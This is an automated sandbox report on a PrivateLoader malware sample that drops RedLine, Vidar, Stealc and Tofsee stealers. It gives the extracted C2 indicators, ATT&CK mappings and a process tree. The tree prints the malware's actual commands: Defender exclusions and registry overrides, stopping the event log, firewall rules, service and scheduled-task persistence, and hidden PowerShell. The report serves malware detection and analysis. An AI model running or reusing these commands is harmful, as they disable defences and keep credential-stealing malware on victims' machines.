privateloader | f5eb4c418e14eb104bfe49e49be961c903ed740279b97035d6d0ce6f8758f34e

Resubmissions

08-06-2024 02:24

240608-cvn1aaff5x 8

08-06-2024 02:06

240608-cjt26agd83 10

Analysis

max time kernel
102s
max time network
141s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
08-06-2024 02:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

setup.exe
Size

631.4MB
MD5

1e88e52ae4838a0aa179c21784cbbb4a
SHA1

b218793843ee4af2842b5182d241ea0f121abffa
SHA256

763711499a127ef7f46615a3275ef62afa097d65e948e98678b81fa0e0315cad
SHA512

89dfe218101559d02524f548d806504a90987c9c66f8f7d8280dc0446bdaeebdf00725f479c5cc99db37b589d19f37b8a229157164690eca3698f9c0480f1110
SSDEEP

98304:rOuBF3zj5prjsd8VNCofaoUhXo8uG9pmSgQ7gCbHRd3bcEo:qunj5prvX8uGxgQZLcEo

Score

10^/10

privateloader redline stealc tofsee vidar logsdiller cloud (tg: @logsdillabot)evasion execution infostealer loader persistence spyware stealer trojan

Malware Config

Extracted

Family

stealc

rc4.plain

Extracted

Family

vidar

https://t.me/r8z0l

https://steamcommunity.com/profiles/76561199698764354

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @logsdillabot)

5.42.65.63:14707

Signatures

Detect Vidar Stealer 3 IoCs

stealer

resource	yara_rule
behavioral8/memory/5052-257-0x0000000000400000-0x0000000000648000-memory.dmp	family_vidar_v7
behavioral8/memory/5052-253-0x0000000000400000-0x0000000000648000-memory.dmp	family_vidar_v7
behavioral8/memory/5052-255-0x0000000000400000-0x0000000000648000-memory.dmp	family_vidar_v7

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	setup.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral8/memory/5488-533-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3780	powershell.exe
1752	powershell.exe
1752	powershell.exe
2612	powershell.EXE

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4380	netsh.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	setup.exe

Executes dropped EXE 2 IoCs

pid	Process
3220	uX8PYYcq_TwO8HXcs8ccDdDm.exe
4676	rKabpfuRcT2t4Plzk0ocnBr8.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
134	iplogger.org
135	iplogger.org

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	api.myip.com
18	api.myip.com
21	ipinfo.io
22	ipinfo.io

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy	setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	setup.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	setup.exe

Launches sc.exe 7 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5264	sc.exe
5436	sc.exe
5892	sc.exe
6044	sc.exe
4820	sc.exe
2580	sc.exe
5288	sc.exe

Program crash 2 IoCs

pid	pid_target	Process	procid_target
5360	628	WerFault.exe	113
5352	3660	WerFault.exe	143

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4624	schtasks.exe
5884	schtasks.exe
5448	schtasks.exe
2076	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4352	timeout.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3604	setup.exe
3604	setup.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3604 wrote to memory of 4676	3604	setup.exe	104
PID 3604 wrote to memory of 4676	3604	setup.exe	104
PID 3604 wrote to memory of 4676	3604	setup.exe	104
PID 3604 wrote to memory of 3220	3604	setup.exe	103
PID 3604 wrote to memory of 3220	3604	setup.exe	103
PID 3604 wrote to memory of 3220	3604	setup.exe	103
PID 3604 wrote to memory of 3160	3604	setup.exe	105
PID 3604 wrote to memory of 3160	3604	setup.exe	105

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
1⤵
- Modifies firewall policy service
- Checks computer location settings
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3604
- C:\Users\Admin\Documents\SimpleAdobe\uX8PYYcq_TwO8HXcs8ccDdDm.exe
  C:\Users\Admin\Documents\SimpleAdobe\uX8PYYcq_TwO8HXcs8ccDdDm.exe
  2⤵
  - Executes dropped EXE
  PID:3220
- - C:\Users\Admin\AppData\Local\Temp\ajB520.exe
    "C:\Users\Admin\AppData\Local\Temp\ajB520.exe" /relaunch=8 /was_elevated=1 /tagdata
    3⤵
    PID:4724
  - - C:\Users\Admin\AppData\Local\Temp\nsqB6F4.tmp\AVGBrowserUpdateSetup.exe
      AVGBrowserUpdateSetup.exe /silent /install "bundlename=AVG Secure Browser&appguid={48F69C39-1356-4A7B-A899-70E3539D4982}&appname=AVG Secure Browser&needsadmin=true&lang=en-US&brand=9249&installargs=--no-create-user-shortcuts --make-chrome-default --force-default-win10 --auto-import-data%3Dmsedge --import-cookies --auto-launch-chrome"
      4⤵
      PID:5656
    - - C:\Program Files (x86)\GUMD0A4.tmp\AVGBrowserUpdate.exe
        
        "C:\Program Files (x86)\GUMD0A4.tmp\AVGBrowserUpdate.exe" /silent /install "bundlename=AVG Secure Browser&appguid={48F69C39-1356-4A7B-A899-70E3539D4982}&appname=AVG Secure Browser&needsadmin=true&lang=en-US&brand=9249&installargs=--no-create-user-shortcuts --make-chrome-default --force-default-win10 --auto-import-data%3Dmsedge --import-cookies --auto-launch-chrome"
        5⤵
        
        PID:2028
      - C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe
        
        "C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /regsvc
        6⤵
        
        PID:5596
      - C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe
        
        "C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /regserver
        6⤵
        
        PID:5880
        
        C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateComRegisterShell64.exe"
        7⤵
        
        PID:3396
        
        C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateComRegisterShell64.exe"
        7⤵
        
        PID:2972
        
        C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateComRegisterShell64.exe"
        7⤵
        
        PID:2384
      - C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe
        
        "C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgb21haGFpZD0iezFDODlFRjJGLUE4OEUtNERFMC05N0ZFLUNCNDBDOEU0RkVFQX0iIHVwZGF0ZXJ2ZXJzaW9uPSIxLjguMTY5My42IiBzaGVsbF92ZXJzaW9uPSIxLjguMTY5My42IiBpc21hY2hpbmU9IjEiIGlzX29tYWhhNjRiaXQ9IjAiIGlzX29zNjRiaXQ9IjEiIHNlc3Npb25pZD0iezI2QTYzNzFFLTVFRDktNEMwOC04NzI5LTYwMTRGMUI0MTY5QX0iIGNlcnRfZXhwX2RhdGU9IjIwMjUwOTE3IiB1c2VyaWQ9InswRTQ1MDkxRC00REY4LTQ1RDEtOTAyMy02OTVCRDA1MEM0NEF9IiB1c2VyaWRfZGF0ZT0iMjAyNDA2MDgiIG1hY2hpbmVpZD0iezAwMDA5QkIwLTk4NjYtMzU5Mi1BM0E2LTA4NkJDQzI5MDlFN30iIG1hY2hpbmVpZF9kYXRlPSIyMDI0MDYwOCIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiB0ZXN0c291cmNlPSJhdXRvIiByZXF1ZXN0aWQ9IntFRDhDMTE4My0wRDVBLTQ2RTUtQURCRi04NzQ2OEEyMDNEMTd9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IHBoeXNtZW1vcnk9IjgiIHNzZT0iMSIgc3NlMj0iMSIgc3NlMz0iMSIgc3NzZTM9IjEiIHNzZTQxPSIxIiBzc2U0Mj0iMSIgYXZ4PSIxIi8-PG9zIHBsYXRmb3JtPSJ3aW4iIHZlcnNpb249IjEwLjAuMTkwNDEuMTI4OCIgc3A9IiIgYXJjaD0ieDY0Ii8-PGFwcCBhcHBpZD0iezFDODlFRjJGLUE4OEUtNERFMC05N0ZFLUNCNDBDOEU0RkVFQX0iIHZlcnNpb249IiIgbmV4dHZlcnNpb249IjEuOC4xNjkzLjYiIGxhbmc9ImVuLVVTIiBicmFuZD0iOTI0OSIgY2xpZW50PSIiPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIGluc3RhbGxfdGltZV9tcz0iMTE1NiIvPjwvYXBwPjwvcmVxdWVzdD4
        6⤵
        
        PID:5724
      - C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe
        
        "C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /handoff "bundlename=AVG Secure Browser&appguid={48F69C39-1356-4A7B-A899-70E3539D4982}&appname=AVG Secure Browser&needsadmin=true&lang=en-US&brand=9249&installargs=--no-create-user-shortcuts --make-chrome-default --force-default-win10 --auto-import-data%3Dmsedge --import-cookies --auto-launch-chrome" /installsource otherinstallcmd /sessionid "{26A6371E-5ED9-4C08-8729-6014F1B4169A}" /silent
        6⤵
        
        PID:4216
- C:\Users\Admin\Documents\SimpleAdobe\rKabpfuRcT2t4Plzk0ocnBr8.exe
  C:\Users\Admin\Documents\SimpleAdobe\rKabpfuRcT2t4Plzk0ocnBr8.exe
  2⤵
  - Executes dropped EXE
  PID:4676
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:3112
- C:\Users\Admin\Documents\SimpleAdobe\PY6JR66TX_lJW87EhbKf9G5y.exe
  C:\Users\Admin\Documents\SimpleAdobe\PY6JR66TX_lJW87EhbKf9G5y.exe
  2⤵
  PID:3160
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    PID:6104
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    PID:6100
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    PID:6000
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    PID:636
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "RULTVSKP"
    3⤵
    - Launches sc.exe
    PID:5436
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "RULTVSKP" binpath= "C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:2580
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:5264
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "RULTVSKP"
    3⤵
    - Launches sc.exe
    PID:5288
- C:\Users\Admin\Documents\SimpleAdobe\b3PG7xBdfbKLfPJZCZ0tmzAD.exe
  C:\Users\Admin\Documents\SimpleAdobe\b3PG7xBdfbKLfPJZCZ0tmzAD.exe
  2⤵
  PID:828
- - C:\Users\Admin\AppData\Local\Temp\7zS8D33.tmp\Install.exe
    .\Install.exe
    3⤵
    PID:1196
  - - C:\Users\Admin\AppData\Local\Temp\7zS9C17.tmp\Install.exe
      .\Install.exe /piRmdidQ "525403" /S
      4⤵
      PID:6020
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        5⤵
        
        PID:1384
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        6⤵
        
        PID:5408
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        7⤵
        
        PID:5520
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        8⤵
        
        PID:2612
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        6⤵
        
        PID:1144
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        7⤵
        
        PID:5960
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        8⤵
        
        PID:5972
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        6⤵
        
        PID:4320
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        7⤵
        
        PID:1064
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        8⤵
        
        PID:5584
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        6⤵
        
        PID:6080
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        7⤵
        
        PID:1628
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        8⤵
        
        PID:3736
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        6⤵
        
        PID:5568
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        7⤵
        
        PID:4508
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1752
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        9⤵
        
        PID:3276
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:4332
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:468
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3780
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:4868
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bGTnZQDECKwDuNSWyq" /SC once /ST 02:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS9C17.tmp\Install.exe\" FN /wPUdidGZwD 525403 /S" /V1 /F
        5⤵
        Creates scheduled task(s)
        
        PID:5448
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bGTnZQDECKwDuNSWyq"
        5⤵
        
        PID:4476
- C:\Users\Admin\Documents\SimpleAdobe\oVkLEolkKst_7DpraKHne2cj.exe
  C:\Users\Admin\Documents\SimpleAdobe\oVkLEolkKst_7DpraKHne2cj.exe
  2⤵
  PID:1576
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:1924
- C:\Users\Admin\Documents\SimpleAdobe\jnUIUmQJ3EohHeAUoNAO8Ye0.exe
  C:\Users\Admin\Documents\SimpleAdobe\jnUIUmQJ3EohHeAUoNAO8Ye0.exe
  2⤵
  PID:4556
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:5884
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:4624
- C:\Users\Admin\Documents\SimpleAdobe\dgNvhupeeLIaker_Kh0LbY9P.exe
  C:\Users\Admin\Documents\SimpleAdobe\dgNvhupeeLIaker_Kh0LbY9P.exe
  2⤵
  PID:1000
- C:\Users\Admin\Documents\SimpleAdobe\nUKhCGwsZ00hZOrQREClgXMh.exe
  C:\Users\Admin\Documents\SimpleAdobe\nUKhCGwsZ00hZOrQREClgXMh.exe
  2⤵
  PID:640
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:5488
- C:\Users\Admin\Documents\SimpleAdobe\7bhyz3LpAvvVyJ3C065BJNmg.exe
  C:\Users\Admin\Documents\SimpleAdobe\7bhyz3LpAvvVyJ3C065BJNmg.exe
  2⤵
  PID:4048
- C:\Users\Admin\Documents\SimpleAdobe\QJ4lvEujT8VBQNIqhfhxIiKK.exe
  C:\Users\Admin\Documents\SimpleAdobe\QJ4lvEujT8VBQNIqhfhxIiKK.exe
  2⤵
  PID:1548
- - C:\Users\Admin\AppData\Local\Temp\is-12DLQ.tmp\QJ4lvEujT8VBQNIqhfhxIiKK.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-12DLQ.tmp\QJ4lvEujT8VBQNIqhfhxIiKK.tmp" /SL5="$20260,4611430,54272,C:\Users\Admin\Documents\SimpleAdobe\QJ4lvEujT8VBQNIqhfhxIiKK.exe"
    3⤵
    PID:860
  - - C:\Users\Admin\AppData\Local\Moon VideoToAudio\moonvideo2audio32.exe
      "C:\Users\Admin\AppData\Local\Moon VideoToAudio\moonvideo2audio32.exe" -i
      4⤵
      PID:5708
  - - C:\Users\Admin\AppData\Local\Moon VideoToAudio\moonvideo2audio32.exe
      "C:\Users\Admin\AppData\Local\Moon VideoToAudio\moonvideo2audio32.exe" -s
      4⤵
      PID:6036
- C:\Users\Admin\Documents\SimpleAdobe\uqxXz2hM83zG7WZ_wXYxN3uY.exe
  C:\Users\Admin\Documents\SimpleAdobe\uqxXz2hM83zG7WZ_wXYxN3uY.exe
  2⤵
  PID:628
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\vcxznuer\
    3⤵
    PID:3992
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\cfcvmoiy.exe" C:\Windows\SysWOW64\vcxznuer\
    3⤵
    PID:5692
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\System32\sc.exe" create vcxznuer binPath= "C:\Windows\SysWOW64\vcxznuer\cfcvmoiy.exe /d\"C:\Users\Admin\Documents\SimpleAdobe\uqxXz2hM83zG7WZ_wXYxN3uY.exe\"" type= own start= auto DisplayName= "wifi support"
    3⤵
    - Launches sc.exe
    PID:5892
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\System32\sc.exe" description vcxznuer "wifi internet conection"
    3⤵
    - Launches sc.exe
    PID:6044
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\System32\sc.exe" start vcxznuer
    3⤵
    - Launches sc.exe
    PID:4820
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
    3⤵
    - Modifies Windows Firewall
    PID:4380
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 628 -s 788
    3⤵
    - Program crash
    PID:5360
- C:\Users\Admin\Documents\SimpleAdobe\nEX0SJjrh2Bbn6QqITUIr5fu.exe
  C:\Users\Admin\Documents\SimpleAdobe\nEX0SJjrh2Bbn6QqITUIr5fu.exe
  2⤵
  PID:4856
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5052
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\CAKKJKKECFID" & exit
      4⤵
      PID:2644
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:4352
- C:\Users\Admin\Documents\SimpleAdobe\yVJbaIuNv6XbsMfOSQcyPNFs.exe
  C:\Users\Admin\Documents\SimpleAdobe\yVJbaIuNv6XbsMfOSQcyPNFs.exe
  2⤵
  PID:3376
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:4828
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:5292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4204,i,11266875042087428226,16669718873272757238,262144 --variations-seed-version --mojo-platform-channel-handle=4116 /prefetch:8
1⤵
PID:4600

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4612

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2076

C:\Windows\SysWOW64\vcxznuer\cfcvmoiy.exe
C:\Windows\SysWOW64\vcxznuer\cfcvmoiy.exe /d"C:\Users\Admin\Documents\SimpleAdobe\uqxXz2hM83zG7WZ_wXYxN3uY.exe"
1⤵
PID:3660
- C:\Windows\SysWOW64\svchost.exe
  svchost.exe
  2⤵
  PID:992
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3660 -s 560
  2⤵
  - Program crash
  PID:5352

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3660 -ip 3660
1⤵
PID:5184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 628 -ip 628
1⤵
PID:5212

C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe
"C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /svc
1⤵
PID:5792
- C:\Program Files (x86)\AVG\Browser\Update\Install\{7E7A4DF1-920E-4C8F-A68E-17FA2510DE71}\AVGBrowserInstaller.exe
  "C:\Program Files (x86)\AVG\Browser\Update\Install\{7E7A4DF1-920E-4C8F-A68E-17FA2510DE71}\AVGBrowserInstaller.exe" --chrome --do-not-launch-chrome --hide-browser-override --show-developer-mode --suppress-first-run-bubbles --default-search-id=3 --default-search=bing.com --adblock-mode-default=0 --no-create-user-shortcuts --make-chrome-default --force-default-win10 --auto-import-data=msedge --import-cookies --auto-launch-chrome --system-level
  2⤵
  PID:5924
- - C:\Program Files (x86)\AVG\Browser\Update\Install\{7E7A4DF1-920E-4C8F-A68E-17FA2510DE71}\CR_7B816.tmp\setup.exe
